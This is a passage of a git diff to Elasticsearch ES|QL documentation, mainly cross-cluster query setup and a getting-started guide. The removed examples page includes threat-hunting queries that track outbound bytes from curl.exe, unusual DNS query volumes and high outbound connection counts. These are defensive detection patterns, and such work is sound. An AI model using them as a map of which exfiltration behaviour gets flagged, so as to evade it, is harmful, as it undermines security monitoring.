-{{esql}} supports these processing commands: - -:::{include} _snippets/lists/processing-commands.md -::: +- An {{esql}} query must start with a [source command](./commands/source-commands.md). +- Use [processing commands](./commands/processing-commands.md) to modify an input table by adding, removing, or transforming rows and columns. \ No newline at end of file diff --git a/docs/reference/query-languages/esql/esql-cross-clusters.md b/docs/reference/query-languages/esql/esql-cross-clusters.md new file mode 100644 index 0000000000000..762c6b2ab6ae9 --- /dev/null +++ b/docs/reference/query-languages/esql/esql-cross-clusters.md @@ -0,0 +1,507 @@ +--- +navigation_title: Query across clusters +mapped_pages: + - https://www.elastic.co/guide/en/elasticsearch/reference/current/esql-cross-clusters.html +applies_to: + stack: preview 9.0, ga 9.1 + serverless: unavailable +products: + - id: elasticsearch +--- + + +# Use ES|QL across clusters [esql-cross-clusters] + +With {{esql}}, you can execute a single query across multiple clusters.
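+For example, a query of this shape (the index and cluster names here are illustrative) counts log events per host across a local index and one remote cluster in a single pass:
+
+```esql
+FROM logs-*,cluster_one:logs-*
+| STATS COUNT(*) BY host.name
+| LIMIT 10
+```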
+ + +## Prerequisites [esql-ccs-prerequisites] + +* {{ccs-cap}} requires remote clusters. To set up remote clusters, see [*Remote clusters*](docs-content://deploy-manage/remote-clusters.md). + + To ensure your remote cluster configuration supports {{ccs}}, see [Supported {{ccs}} configurations](docs-content://solutions/search/cross-cluster-search.md#ccs-supported-configurations). + +* For full {{ccs}} capabilities, the local and remote cluster must be on the same [subscription level](https://www.elastic.co/subscriptions). +* The local coordinating node must have the [`remote_cluster_client`](docs-content://deploy-manage/distributed-architecture/clusters-nodes-shards/node-roles.md#remote-node) node role. +* If you use [sniff mode](docs-content://deploy-manage/remote-clusters/remote-clusters-self-managed.md#sniff-mode), the local coordinating node must be able to connect to seed and gateway nodes on the remote cluster. + + We recommend using gateway nodes capable of serving as coordinating nodes. The seed nodes can be a subset of these gateway nodes. + +* If you use [proxy mode](docs-content://deploy-manage/remote-clusters/remote-clusters-self-managed.md#proxy-mode), the local coordinating node must be able to connect to the configured `proxy_address`. The proxy at this address must be able to route connections to gateway and coordinating nodes on the remote cluster. +* {{ccs-cap}} requires different security privileges on the local cluster and remote cluster. See [Configure privileges for {{ccs}}](docs-content://deploy-manage/remote-clusters/remote-clusters-cert.md#remote-clusters-privileges-ccs) and [*Remote clusters*](docs-content://deploy-manage/remote-clusters.md). + + +## Security model [esql-ccs-security-model] + +{{es}} supports two security models for cross-cluster search (CCS): + +* [TLS certificate authentication](#esql-ccs-security-model-certificate) +* [API key authentication](#esql-ccs-security-model-api-key) + +::::{tip} +To check which security model is being used to connect your clusters, run `GET _remote/info`. If you’re using the API key authentication method, you’ll see the `"cluster_credentials"` key in the response. + +:::: + + + +### TLS certificate authentication [esql-ccs-security-model-certificate] + +::::{admonition} Deprecated in 9.0.0. +:class: warning + +Use [API key authentication](#esql-ccs-security-model-api-key) instead. +:::: + + +TLS certificate authentication secures remote clusters with mutual TLS. This could be the preferred model when a single administrator has full control over both clusters. We generally recommend that roles and their privileges be identical in both clusters. + +Refer to [TLS certificate authentication](docs-content://deploy-manage/remote-clusters/remote-clusters-cert.md) for prerequisites and detailed setup instructions. + + +### API key authentication [esql-ccs-security-model-api-key] + +The following information pertains to using {{esql}} across clusters with the [**API key based security model**](docs-content://deploy-manage/remote-clusters/remote-clusters-api-key.md). You’ll need to follow the steps on that page for the **full setup instructions**. This page only contains additional information specific to {{esql}}. + +API key based cross-cluster search (CCS) enables more granular control over allowed actions between clusters. This may be the preferred model when you have different administrators for different clusters and want more control over who can access what data.
In this model, cluster administrators must explicitly define the access given to clusters and users. + +You will need to: + +* Create an API key on the **remote cluster** using the [Create cross-cluster API key](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-create-cross-cluster-api-key) API or using the [Kibana API keys UI](docs-content://deploy-manage/api-keys/elasticsearch-api-keys.md). +* Add the API key to the keystore on the **local cluster**, as part of the steps in [configuring the local cluster](docs-content://deploy-manage/remote-clusters/remote-clusters-api-key.md#remote-clusters-security-api-key-local-actions). All cross-cluster requests from the local cluster are bound by the API key’s privileges. + +Using {{esql}} with the API key based security model requires some additional permissions that may not be needed when using the traditional query DSL based search. The following example API call creates a role that can query remote indices using {{esql}} when using the API key based security model. The final privilege, `remote_cluster`, is required to allow remote enrich operations. + +```console +POST /_security/role/remote1 +{ + "cluster": ["cross_cluster_search"], <1> + "indices": [ + { + "names" : [""], <2> + "privileges": ["read"] + } + ], + "remote_indices": [ <3> + { + "names": [ "logs-*" ], + "privileges": [ "read","read_cross_cluster" ], <4> + "clusters" : ["my_remote_cluster"] <5> + } + ], + "remote_cluster": [ <6> + { + "privileges": [ + "monitor_enrich" + ], + "clusters": [ + "my_remote_cluster" + ] + } + ] +} +``` + +1. The `cross_cluster_search` cluster privilege is required for the *local* cluster. +2. Typically, users will have permissions to read both local and remote indices. However, for cases where the role is intended to ONLY search the remote cluster, the `read` permission is still required for the local cluster. To provide read access to the local cluster, but disallow reading any indices in the local cluster, the `names` field may be an empty string. +3. The indices allowed read access to the remote cluster. The configured [cross-cluster API key](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-create-cross-cluster-api-key) must also allow this index to be read. +4. The `read_cross_cluster` privilege is always required when using {{esql}} across clusters with the API key based security model. +5. The remote clusters to which these privileges apply. The remote cluster must be configured with a [cross-cluster API key](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-security-create-cross-cluster-api-key), and the local cluster must be connected to it, before the remote index can be queried. Verify the connection using the [Remote cluster info](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-remote-info) API. +6. Required to allow remote enrichment. Without this, the user cannot read from the `.enrich` indices on the remote cluster. The `remote_cluster` security privilege was introduced in version **8.15.0**. + + +You will then need a user or API key with the permissions you created above. The following example API call creates a user with the `remote1` role. + +```console +POST /_security/user/remote_user +{ + "password" : "", + "roles" : [ "remote1" ] +} +``` + +Remember that all cross-cluster requests from the local cluster are bound by the cross cluster API key’s privileges, which are controlled by the remote cluster’s administrator.
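+As a quick sanity check (a sketch; the response shape depends on your setup and is not shown here), you can call the remote cluster info API mentioned in the tip above and confirm that the entry for `my_remote_cluster` contains the `cluster_credentials` field, which indicates the API key security model is in use:
+
+```console
+GET /_remote/info
+```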
+ +::::{tip} +Cross cluster API keys created in versions prior to 8.15.0 will need to be replaced or updated to add the new permissions required for {{esql}} with ENRICH. + +:::: + + + +## Remote cluster setup [ccq-remote-cluster-setup] + +Once the security model is configured, you can add remote clusters. + +The following [cluster update settings](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-cluster-put-settings) API request adds three remote clusters: `cluster_one`, `cluster_two`, and `cluster_three`. + +```console +PUT _cluster/settings +{ + "persistent": { + "cluster": { + "remote": { + "cluster_one": { + "seeds": [ + "35.238.149.1:9300" + ], + "skip_unavailable": true + }, + "cluster_two": { + "seeds": [ + "35.238.149.2:9300" + ], + "skip_unavailable": false + }, + "cluster_three": { <1> + "seeds": [ + "35.238.149.3:9300" + ] + } + } + } + } +} +``` + +1. Since `skip_unavailable` was not set on `cluster_three`, it uses the default of `true`. See the [Optional remote clusters](#ccq-skip-unavailable-clusters) section for details. + + + +## Query across multiple clusters [ccq-from] + +In the `FROM` command, specify data streams and indices on remote clusters using the format `<remote_cluster_name>:<target>`. For instance, the following {{esql}} request queries the `my-index-000001` index on a single remote cluster named `cluster_one`: + +```esql +FROM cluster_one:my-index-000001 +| LIMIT 10 +``` + +Similarly, this {{esql}} request queries the `my-index-000001` index from three clusters: + +* The local ("querying") cluster +* Two remote clusters, `cluster_one` and `cluster_two` + +```esql +FROM my-index-000001,cluster_one:my-index-000001,cluster_two:my-index-000001 +| LIMIT 10 +``` + +Likewise, this {{esql}} request queries the `my-index-000001` index from all remote clusters (`cluster_one`, `cluster_two`, and `cluster_three`): + +```esql +FROM *:my-index-000001 +| LIMIT 10 +``` + + +## Cross-cluster metadata [ccq-cluster-details] + +Using the `"include_ccs_metadata": true` option, users can request that ES|QL {{ccs}} responses include metadata about the search on each cluster (when the response format is JSON). Here we show an example using the async search endpoint. {{ccs-cap}} metadata is also present in the synchronous search endpoint response when requested. If the search returns partial results and there are partial shard or remote cluster failures, `_clusters` metadata containing the failures will be included in the response regardless of the `include_ccs_metadata` parameter.
+ +```console +POST /_query/async?format=json +{ + "query": """ + FROM my-index-000001,cluster_one:my-index-000001,cluster_two:my-index* + | STATS COUNT(http.response.status_code) BY user.id + | LIMIT 2 + """, + "include_ccs_metadata": true +} +``` + +Which returns: + +```console-result +{ + "is_running": false, + "took": 42, <1> + "is_partial": false, <7> + "columns" : [ + { + "name" : "COUNT(http.response.status_code)", + "type" : "long" + }, + { + "name" : "user.id", + "type" : "keyword" + } + ], + "values" : [ + [4, "elkbee"], + [1, "kimchy"] + ], + "_clusters": { <2> + "total": 3, + "successful": 3, + "running": 0, + "skipped": 0, + "partial": 0, + "failed": 0, + "details": { <3> + "(local)": { <4> + "status": "successful", + "indices": "blogs", + "took": 41, <5> + "_shards": { <6> + "total": 13, + "successful": 13, + "skipped": 0, + "failed": 0 + } + }, + "cluster_one": { + "status": "successful", + "indices": "cluster_one:my-index-000001", + "took": 38, + "_shards": { + "total": 4, + "successful": 4, + "skipped": 0, + "failed": 0 + } + }, + "cluster_two": { + "status": "successful", + "indices": "cluster_two:my-index*", + "took": 40, + "_shards": { + "total": 18, + "successful": 18, + "skipped": 1, + "failed": 0 + } + } + } + } +} +``` + +1. How long the entire search (across all clusters) took, in milliseconds. +2. This section of counters shows all possible cluster search states and how many cluster searches are currently in that state. The clusters can have one of the following statuses: **running**, **successful** (searches on all shards were successful), **skipped** (the search failed on a cluster marked with `skip_unavailable`=`true`), **failed** (the search failed on a cluster marked with `skip_unavailable`=`false`) or **partial** (the search was [interrupted](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-esql) before finishing or has partially failed). +3. The `_clusters/details` section shows metadata about the search on each cluster. +4. If you included indices from the local cluster you sent the request to in your {{ccs}}, it is identified as "(local)". +5. How long (in milliseconds) the search took on each cluster. This can be useful to determine which clusters have slower response times than others. +6. The shard details for the search on that cluster, including a count of shards that were skipped due to the can-match phase results. Shards are skipped when they cannot have any matching data and therefore are not included in the full ES|QL query. +7. The `is_partial` field is set to `true` if the search has partial results for any reason, for example due to partial shard failures, +failures in remote clusters, or if the async query was stopped by calling the [async query stop API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-esql). + +The cross-cluster metadata can be used to determine whether any data came back from a cluster. For instance, in the query below, the wildcard expression for `cluster_two` did not resolve to a concrete index (or indices). The cluster is, therefore, marked as *skipped* and the total number of shards searched is set to zero. + +```console +POST /_query/async?format=json +{ + "query": """ + FROM cluster_one:my-index*,cluster_two:logs* + | STATS COUNT(http.response.status_code) BY user.id + | LIMIT 2 + """, + "include_ccs_metadata": true +} +``` + +Which returns: + +```console-result +{ + "is_running": false, + "took": 55, + "is_partial": true, <3> + "columns": [ + ... + ], + "values": [ + ...
+ ], + "_clusters": { + "total": 2, + "successful": 1, + "running": 0, + "skipped": 1, <1> + "partial": 0, + "failed": 0, + "details": { + "cluster_one": { + "status": "successful", + "indices": "cluster_one:my-index*", + "took": 38, + "_shards": { + "total": 4, + "successful": 4, + "skipped": 0, + "failed": 0 + } + }, + "cluster_two": { + "status": "skipped", <1> + "indices": "cluster_two:logs*", + "took": 0, + "_shards": { + "total": 0, <2> + "successful": 0, + "skipped": 0, + "failed": 0 + } + } + } + } +} +``` + +1. This cluster is marked as *skipped*, since there were no matching indices on that cluster. +2. Indicates that no shards were searched (due to not having any matching indices). +3. Since one of the clusters is skipped, the search result is marked as partial. + + + +## Enrich across clusters [ccq-enrich] + +Enrich in {{esql}} across clusters operates similarly to [local enrich](commands/enrich.md). If the enrich policy and its enrich indices are consistent across all clusters, simply write the enrich command as you would without remote clusters. In this default mode, {{esql}} can execute the enrich command on either the local cluster or the remote clusters, aiming to minimize computation or inter-cluster data transfer. Ensuring that the policy exists with consistent data on both the local cluster and the remote clusters is critical for ES|QL to produce a consistent query result. + +::::{tip} +Enrich in {{esql}} across clusters using the API key based security model was introduced in version **8.15.0**. Cross cluster API keys created in versions prior to 8.15.0 will need to be replaced or updated to use the new required permissions. Refer to the example in the [API key authentication](#esql-ccs-security-model-api-key) section. + +:::: + + +In the following example, enrichment with the `hosts` policy can be executed on either the local cluster or the remote cluster `cluster_one`. + +```esql +FROM my-index-000001,cluster_one:my-index-000001 +| ENRICH hosts ON ip +| LIMIT 10 +``` + +Even when an {{esql}} query targets only remote clusters, enrichment can still happen on the local cluster. This means the below query requires the `hosts` enrich policy to exist on the local cluster as well. + +```esql +FROM cluster_one:my-index-000001,cluster_two:my-index-000001 +| LIMIT 10 +| ENRICH hosts ON ip +``` + + +### Enrich with coordinator mode [esql-enrich-coordinator] + +{{esql}} provides the enrich `_coordinator` mode to force {{esql}} to execute the enrich command on the local cluster. This mode should be used when the enrich policy is not available on the remote clusters or maintaining consistency of enrich indices across clusters is challenging. + +```esql +FROM my-index-000001,cluster_one:my-index-000001 +| ENRICH _coordinator:hosts ON ip +| SORT host_name +| LIMIT 10 +``` + +::::{important} +Enrich with the `_coordinator` mode usually increases inter-cluster data transfer and workload on the local cluster. + +:::: + + + +### Enrich with remote mode [esql-enrich-remote] + +{{esql}} also provides the enrich `_remote` mode to force {{esql}} to execute the enrich command independently on each remote cluster where the target indices reside. This mode is useful for managing different enrich data on each cluster, such as detailed information of hosts for each region where the target (main) indices contain log events from these hosts.
+ +In the below example, the `hosts` enrich policy is required to exist on all participating clusters: the local (querying) cluster (as local indices are included), and the remote clusters `cluster_one` and `cluster_two`. + +```esql +FROM my-index-000001,cluster_one:my-index-000001,cluster_two:my-index-000001 +| ENRICH _remote:hosts ON ip +| SORT host_name +| LIMIT 10 +``` + +A `_remote` enrich cannot be executed after a [`STATS`](commands/stats-by.md) command. The following example would result in an error: + +```esql +FROM my-index-000001,cluster_one:my-index-000001,cluster_two:my-index-000001 +| STATS COUNT(*) BY ip +| ENRICH _remote:hosts ON ip +| SORT host_name +| LIMIT 10 +``` + + +### Multiple enrich commands [esql-multi-enrich] + +You can include multiple enrich commands in the same query with different modes. {{esql}} will attempt to execute them accordingly. For example, this query performs two enrich operations, first with the `hosts` policy on any cluster and then with the `vendors` policy on the local cluster. + +```esql +FROM my-index-000001,cluster_one:my-index-000001,cluster_two:my-index-000001 +| ENRICH hosts ON ip +| ENRICH _coordinator:vendors ON os +| LIMIT 10 +``` + +A `_remote` enrich command can’t be executed after a `_coordinator` enrich command. The following example would result in an error: + +```esql +FROM my-index-000001,cluster_one:my-index-000001,cluster_two:my-index-000001 +| ENRICH _coordinator:hosts ON ip +| ENRICH _remote:vendors ON os +| LIMIT 10 +``` + + +## Excluding clusters or indices from an {{esql}} query [ccq-exclude] + +To exclude an entire cluster, prefix the cluster alias with a minus sign in the `FROM` command, for example: `-my_cluster:*`: + +```esql +FROM my-index-000001,cluster*:my-index-000001,-cluster_three:* +| LIMIT 10 +``` + +To exclude a specific remote index, prefix the index with a minus sign in the `FROM` command, such as `my_cluster:-my_index`: + +```esql +FROM my-index-000001,cluster*:my-index-*,cluster_three:-my-index-000001 +| LIMIT 10 +``` + + +## Skipping problematic remote clusters [ccq-skip-unavailable-clusters] + +{{ccs-cap}} for {{esql}} behavior when there are problems connecting to or running a query on remote clusters differs between versions. + +::::{tab-set} + +:::{tab-item} 9.1 +Remote clusters are configured with the `skip_unavailable: true` setting by default. With this setting, clusters are marked as `skipped` or `partial` rather than causing queries to fail in the following scenarios: + +* The remote cluster is disconnected from the querying cluster, either before or during the query execution. +* The remote cluster does not have the requested index, or it is not accessible due to security settings. +* An error happened while processing the query on the remote cluster. + +The `partial` status means the remote query either has errors or was interrupted by an explicit user action, but some data may be returned. + +Queries will still fail when `skip_unavailable` is set to `true`, if none of the specified indices exist. For example, the +following queries will fail: + +```esql +FROM cluster_one:missing-index | LIMIT 10 +FROM cluster_one:missing-index* | LIMIT 10 +FROM cluster_one:missing-index*,cluster_two:missing-index | LIMIT 10 +``` +::: + +:::{tab-item} 9.0 +If a remote cluster disconnects from the querying cluster, {{ccs}} for {{esql}} will set it to `skipped` +and continue the query with other clusters, unless the remote cluster's `skip_unavailable` setting is set to `false`, +in which case the query will fail.
+::: + +:::: + +## Query across clusters during an upgrade [ccq-during-upgrade] + +You can still search a remote cluster while performing a rolling upgrade on the local cluster. However, the local coordinating node’s "upgrade from" and "upgrade to" version must be compatible with the remote cluster’s gateway node. + +::::{warning} +Running multiple versions of {{es}} in the same cluster beyond the duration of an upgrade is not supported. +:::: + + +For more information about upgrades, see [Upgrading {{es}}](docs-content://deploy-manage/upgrade/deployment-or-cluster.md). diff --git a/docs/reference/query-languages/esql/esql-enrich-data.md b/docs/reference/query-languages/esql/esql-enrich-data.md index ac225622700fa..d841dfcb14a4c 100644 --- a/docs/reference/query-languages/esql/esql-enrich-data.md +++ b/docs/reference/query-languages/esql/esql-enrich-data.md @@ -6,7 +6,7 @@ mapped_pages: # Combine data from multiple indices with `ENRICH` [esql-enrich-data] -The {{esql}} [`ENRICH`](/reference/query-languages/esql/commands/processing-commands.md#esql-enrich) processing command combines, at query-time, data from one or more source indexes with field-value combinations found in {{es}} enrich indexes. +The {{esql}} [`ENRICH`](/reference/query-languages/esql/commands/enrich.md) processing command combines, at query-time, data from one or more source indexes with field-value combinations found in {{es}} enrich indexes. For example, you can use `ENRICH` to: @@ -14,7 +14,7 @@ For example, you can use `ENRICH` to: * Add product information to retail orders based on product IDs * Supplement contact information based on an email address -[`ENRICH`](/reference/query-languages/esql/commands/processing-commands.md#esql-enrich) is similar to [`LOOKUP join`](/reference/query-languages/esql/commands/processing-commands.md#esql-lookup-join) in the fact that they both help you join data together. You should use `ENRICH` when: +[`ENRICH`](/reference/query-languages/esql/commands/enrich.md) is similar to [`LOOKUP JOIN`](/reference/query-languages/esql/commands/lookup-join.md) in that they both help you join data together. You should use `ENRICH` when: * Enrichment data doesn't change frequently * You can accept index-time overhead @@ -125,7 +125,7 @@ Once the enrich policy is created, you need to execute it using the [execute enr The *enrich index* contains documents from the policy’s source indices. Enrich indices always begin with `.enrich-*`, are read-only, and are [force merged](https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-indices-forcemerge). ::::{warning} -Enrich indices should only be used by the [enrich processor](/reference/enrich-processor/enrich-processor.md) or the [{{esql}} `ENRICH` command](/reference/query-languages/esql/commands/processing-commands.md#esql-enrich). Avoid using enrich indices for other purposes. +Enrich indices should only be used by the [enrich processor](/reference/enrich-processor/enrich-processor.md) or the [{{esql}} `ENRICH` command](/reference/query-languages/esql/commands/enrich.md). Avoid using enrich indices for other purposes. :::: @@ -133,7 +133,7 @@ Enrich indices should only be used by the [enrich-p ### Use the enrich policy [esql-use-enrich] -After the policy has been executed, you can use the [`ENRICH` command](/reference/query-languages/esql/commands/processing-commands.md#esql-enrich) to enrich your data.
+After the policy has been executed, you can use the [`ENRICH` command](/reference/query-languages/esql/commands/enrich.md) to enrich your data. :::{image} ../images/esql-enrich-command.png :alt: esql enrich command diff --git a/docs/reference/query-languages/esql/esql-examples.md b/docs/reference/query-languages/esql/esql-examples.md index 6f5fccde5d15b..ebcac3c1d5c5f 100644 --- a/docs/reference/query-languages/esql/esql-examples.md +++ b/docs/reference/query-languages/esql/esql-examples.md @@ -1,91 +1,11 @@ --- -navigation_title: "Examples" +navigation_title: "Tutorials" --- -# {{esql}} examples [esql-examples] +# {{esql}} tutorials [esql-examples] -## Aggregating and enriching windows event logs +Use these hands-on tutorials to explore practical use cases with {{esql}}: -```esql -FROM logs-* -| WHERE event.code IS NOT NULL -| STATS event_code_count = COUNT(event.code) BY event.code,host.name -| ENRICH win_events ON event.code WITH event_description -| WHERE event_description IS NOT NULL and host.name IS NOT NULL -| RENAME event_description AS event.description -| SORT event_code_count DESC -| KEEP event_code_count,event.code,host.name,event.description -``` - -* It starts by querying logs from indices that match the pattern "logs-*". -* Filters events where the "event.code" field is not null. -* Aggregates the count of events by "event.code" and "host.name." -* Enriches the events with additional information using the "EVENT_DESCRIPTION" field. -* Filters out events where "EVENT_DESCRIPTION" or "host.name" is null. -* Renames "EVENT_DESCRIPTION" as "event.description." -* Sorts the result by "event_code_count" in descending order. -* Keeps only selected fields: "event_code_count," "event.code," "host.name," and "event.description." - - -## Summing outbound traffic from a process `curl.exe` - -```esql -FROM logs-endpoint -| WHERE process.name == "curl.exe" -| STATS bytes = SUM(destination.bytes) BY destination.address -| EVAL kb = bytes/1024 -| SORT kb DESC -| LIMIT 10 -| KEEP kb,destination.address -``` - -* Queries logs from the "logs-endpoint" source. -* Filters events where the "process.name" field is "curl.exe." -* Calculates the sum of bytes sent to destination addresses and converts it to kilobytes (KB). -* Sorts the results by "kb" (kilobytes) in descending order. -* Limits the output to the top 10 results. -* Keeps only the "kb" and "destination.address" fields. - - - -## Manipulating DNS logs to find a high number of unique dns queries per registered domain - -```esql -FROM logs-* -| GROK dns.question.name "%{DATA}\\.%{GREEDYDATA:dns.question.registered_domain:string}" -| STATS unique_queries = COUNT_DISTINCT(dns.question.name) BY dns.question.registered_domain, process.name -| WHERE unique_queries > 10 -| SORT unique_queries DESC -| RENAME unique_queries AS `Unique Queries`, dns.question.registered_domain AS `Registered Domain`, process.name AS `Process` -``` - -* Queries logs from indices matching "logs-*." -* Uses the "grok" pattern to extract the registered domain from the "dns.question.name" field. -* Calculates the count of unique DNS queries per registered domain and process name. -* Filters results where "unique_queries" are greater than 10. -* Sorts the results by "unique_queries" in descending order. -* Renames fields for clarity: "unique_queries" to "Unique Queries," "dns.question.registered_domain" to "Registered Domain," and "process.name" to "Process." 
- - - -## Identifying high-numbers of outbound user connections - -```esql -FROM logs-* -| WHERE NOT CIDR_MATCH(destination.ip, "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16") -| STATS destcount = COUNT(destination.ip) BY user.name, host.name -| ENRICH ldap_lookup_new ON user.name -| WHERE group.name IS NOT NULL -| EVAL follow_up = CASE(destcount >= 100, "true","false") -| SORT destcount DESC -| KEEP destcount, host.name, user.name, group.name, follow_up -``` - -* Queries logs from indices matching "logs-*." -* Filters out events where the destination IP address falls within private IP address ranges (e.g., 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16). -* Calculates the count of unique destination IPs by "user.name" and "host.name." -* Enriches the "user.name" field with LDAP group information. -* Filters out results where "group.name" is not null. -* Uses a "CASE" statement to create a "follow_up" field, setting it to "true" when "destcount" is greater than or equal to 100 and "false" otherwise. -* Sorts the results by "destcount" in descending order. -* Keeps selected fields: "destcount," "host.name," "user.name," "group.name," and "follow_up." +- [](esql-getting-started.md): Learn the basic syntax of the language. +- [Search and filter with {{esql}}](esql-search-tutorial.md): Learn how to use {{esql}} to search and filter data. +- [Threat hunting with {{esql}}](docs-content://solutions/security/esql-for-security/esql-threat-hunting-tutorial.md): Learn how to use {{esql}} for advanced threat hunting techniques and security analysis. \ No newline at end of file diff --git a/docs/reference/query-languages/esql/esql-getting-started.md b/docs/reference/query-languages/esql/esql-getting-started.md new file mode 100644 index 0000000000000..a24baaea4b3e6 --- /dev/null +++ b/docs/reference/query-languages/esql/esql-getting-started.md @@ -0,0 +1,424 @@ +--- +applies_to: + stack: ga + serverless: ga +navigation_title: Get started +--- + +# Get started with {{esql}} queries [esql-getting-started] + +This hands-on guide covers the basics of using {{esql}} to query and aggregate your data. + +::::{tip} +This getting started guide is also available as an [interactive Python notebook](https://github.com/elastic/elasticsearch-labs/blob/main/notebooks/esql/esql-getting-started.ipynb) in the `elasticsearch-labs` GitHub repository. +:::: + +## Prerequisites [esql-getting-started-prerequisites] + +To follow along with the queries in this guide, you can either set up your own deployment, or use Elastic’s public {{esql}} demo environment. + +:::::::{tab-set} + +::::::{tab-item} Own deployment +First ingest some sample data. In {{kib}}, open the main menu and select **Dev Tools**.
Run the following two requests: + +```console +PUT sample_data +{ + "mappings": { + "properties": { + "client_ip": { + "type": "ip" + }, + "message": { + "type": "keyword" + } + } + } +} + +PUT sample_data/_bulk +{"index": {}} +{"@timestamp": "2023-10-23T12:15:03.360Z", "client_ip": "172.21.2.162", "message": "Connected to 10.1.0.3", "event_duration": 3450233} +{"index": {}} +{"@timestamp": "2023-10-23T12:27:28.948Z", "client_ip": "172.21.2.113", "message": "Connected to 10.1.0.2", "event_duration": 2764889} +{"index": {}} +{"@timestamp": "2023-10-23T13:33:34.937Z", "client_ip": "172.21.0.5", "message": "Disconnected", "event_duration": 1232382} +{"index": {}} +{"@timestamp": "2023-10-23T13:51:54.732Z", "client_ip": "172.21.3.15", "message": "Connection error", "event_duration": 725448} +{"index": {}} +{"@timestamp": "2023-10-23T13:52:55.015Z", "client_ip": "172.21.3.15", "message": "Connection error", "event_duration": 8268153} +{"index": {}} +{"@timestamp": "2023-10-23T13:53:55.832Z", "client_ip": "172.21.3.15", "message": "Connection error", "event_duration": 5033755} +{"index": {}} +{"@timestamp": "2023-10-23T13:55:01.543Z", "client_ip": "172.21.3.15", "message": "Connected to 10.1.0.1", "event_duration": 1756467} +``` +:::::: + +::::::{tab-item} Demo environment +The data set used in this guide has been preloaded into the Elastic {{esql}} public demo environment. Visit [ela.st/ql](https://ela.st/ql) to start using it. +:::::: + +::::::: + +## Run an {{esql}} query [esql-getting-started-running-queries] + +In {{kib}}, you can use Console or Discover to run {{esql}} queries: + +:::::::{tab-set} + +::::::{tab-item} Console +To get started with {{esql}} in Console, open the main menu and select **Dev Tools**. + +The general structure of an [{{esql}} query API](https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-esql) request is: + +```txt +POST /_query?format=txt +{ + "query": """ + + """ +} +``` + +Enter the actual {{esql}} query between the two sets of triple quotes. For example: + +```txt +POST /_query?format=txt +{ + "query": """ +FROM kibana_sample_data_logs + """ +} +``` + +:::::: + +::::::{tab-item} Discover +To get started with {{esql}} in Discover, open the main menu and select **Discover**. Next, select **Try ES|QL** from the application menu bar. + +Adjust the time filter so it includes the timestamps in the sample data (October 23rd, 2023). + +After switching to {{esql}} mode, the query bar shows a sample query. You can replace this query with the queries in this getting started guide. + +You can adjust the editor’s height by dragging its bottom border to your liking. +:::::: + +::::::: + +## Your first {{esql}} query [esql-getting-started-first-query] + +Each {{esql}} query starts with a [source command](commands/source-commands.md). A source command produces a table, typically with data from {{es}}. + +:::{image} ../images/elasticsearch-reference-source-command.svg +:alt: A source command producing a table from {{es}} +::: + +The [`FROM`](commands/from.md) source command returns a table with documents from a data stream, index, or alias. Each row in the resulting table represents a document. This query returns up to 1000 documents from the `sample_data` index: + +```esql +FROM sample_data +``` + +Each column corresponds to a field, and can be accessed by the name of that field. + +::::{tip} +{{esql}} keywords are case-insensitive. 
The following query is identical to the previous one: + +```esql +from sample_data +``` + +:::: + + + +## Processing commands [esql-getting-started-limit] + +A source command can be followed by one or more [processing commands](commands/processing-commands.md), separated by a pipe character: `|`. Processing commands change an input table by adding, removing, or changing rows and columns. Processing commands can perform filtering, projection, aggregation, and more. + +:::{image} ../images/elasticsearch-reference-esql-limit.png +:alt: A processing command changing an input table +:width: 500px +::: + +For example, you can use the [`LIMIT`](commands/limit.md) command to limit the number of rows that are returned, up to a maximum of 10,000 rows: + +```esql +FROM sample_data +| LIMIT 3 +``` + +::::{tip} +For readability, you can put each command on a separate line. However, you don’t have to. The following query is identical to the previous one: + +```esql +FROM sample_data | LIMIT 3 +``` + +:::: + + + +### Sort a table [esql-getting-started-sort] + +:::{image} ../images/elasticsearch-reference-esql-sort.png +:alt: A processing command sorting an input table +:width: 500px +::: + +Another processing command is the [`SORT`](commands/sort.md) command. By default, the rows returned by `FROM` don’t have a defined sort order. Use the `SORT` command to sort rows on one or more columns: + +```esql +FROM sample_data +| SORT @timestamp DESC +``` + + +### Query the data [esql-getting-started-where] + +Use the [`WHERE`](commands/where.md) command to query the data. For example, to find all events with a duration longer than 5ms: + +```esql +FROM sample_data +| WHERE event_duration > 5000000 +``` + +`WHERE` supports several [operators](functions-operators/operators.md). For example, you can use [`LIKE`](functions-operators/operators.md#esql-like) to run a wildcard query against the `message` column: + +```esql +FROM sample_data +| WHERE message LIKE "Connected*" +``` + + +### More processing commands [esql-getting-started-more-commands] + +There are many other processing commands, like [`KEEP`](commands/keep.md) and [`DROP`](commands/drop.md) to keep or drop columns, [`ENRICH`](commands/enrich.md) to enrich a table with data from indices in {{es}}, and [`DISSECT`](commands/dissect.md) and [`GROK`](commands/grok.md) to process data. Refer to [Processing commands](commands/processing-commands.md) for an overview of all processing commands. + + +## Chain processing commands [esql-getting-started-chaining] + +You can chain processing commands, separated by a pipe character: `|`. Each processing command works on the output table of the previous command. The result of a query is the table produced by the final processing command. + +:::{image} ../images/elasticsearch-reference-esql-sort-limit.png +:alt: Processing commands can be chained +::: + +The following example first sorts the table on `@timestamp`, and next limits the result set to 3 rows: + +```esql +FROM sample_data +| SORT @timestamp DESC +| LIMIT 3 +``` + +::::{note} +The order of processing commands is important. First limiting the result set to 3 rows before sorting those 3 rows would most likely return a result that is different than this example, where the sorting comes before the limit. +:::: + + + +## Compute values [esql-getting-started-eval] + +Use the [`EVAL`](commands/eval.md) command to append columns to a table, with calculated values. For example, the following query appends a `duration_ms` column. 
